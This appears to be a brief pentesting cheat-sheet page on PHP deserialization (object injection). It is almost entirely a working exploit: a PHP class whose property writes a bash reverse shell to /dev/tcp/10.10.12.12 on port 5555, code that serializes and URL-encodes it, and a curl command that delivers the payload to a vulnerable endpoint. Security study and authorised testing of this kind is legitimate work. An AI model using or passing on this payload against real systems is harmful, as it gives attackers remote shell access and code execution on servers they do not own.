PHP deserialization

class Example2 {
  public $user_file = 'exploit.php';
  public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.12.12/5555 0>&1\'"); ?>';
}
print urlencode(serialize(new Example2));

Running above snippet in interactive php shell php -a would generate payload (URL encoded variable) that can be passed as GET variable.

e.g:

curl -i http://my.rce.domain/vuln.php?args=O%3A14abovegeneratedVaRiAbLe

More about PHP Object Injection, PHP Deserialization.

PreviousReverse Shell NextPHP

Last updated 4 years ago